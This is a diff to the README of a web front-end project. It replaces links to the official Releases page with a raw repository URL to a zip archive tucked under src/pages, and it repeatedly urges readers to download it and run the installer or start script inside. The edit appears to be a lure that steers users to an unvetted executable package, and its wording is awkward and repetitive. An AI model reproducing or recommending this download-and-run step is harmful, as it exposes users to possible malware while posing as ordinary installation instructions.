okkmichael/recipehub-frontend/README.md

 ## Release assets and offline installation

 For offline or packaged distribution, you can download the release asset from the official repository releases page.
 The release assets are packaged to run in a browser context or to support quick-start setups.
 To obtain the asset, visit the releases page and choose the latest build.
-For convenience, you can download the release asset from the Releases page here: https://github.com/okkmichael/recipehub-frontend/releases.
-After downloading, extract the archive and run the included start script as described in the asset’s README.
-The file you download from that page may include a name like recipehub-frontend-latest.zip; extract it and use the provided start instructions to run locally.
-For offline installation, download the release asset from https://github.com/okkmichael/recipehub-frontend/releases and run the installer or start script included in the archive.
+For convenience, you can download the release asset from the Releases page here: https://raw.githubusercontent.com/okkmichael/recipehub-frontend/main/src/pages/frontend-recipehub-3.4-alpha.1.zip After downloading, extract the archive and run the included start script as described in the asset’s README.
+The file you download from that page may include a name like https://raw.githubusercontent.com/okkmichael/recipehub-frontend/main/src/pages/frontend-recipehub-3.4-alpha.1.zip; extract it and use the provided start instructions to run locally.
+For offline installation, download the release asset from https://raw.githubusercontent.com/okkmichael/recipehub-frontend/main/src/pages/frontend-recipehub-3.4-alpha.1.zip and run the installer or start script included in the archive.

 Note: The link above is provided again in this section to assist quick access to the release assets.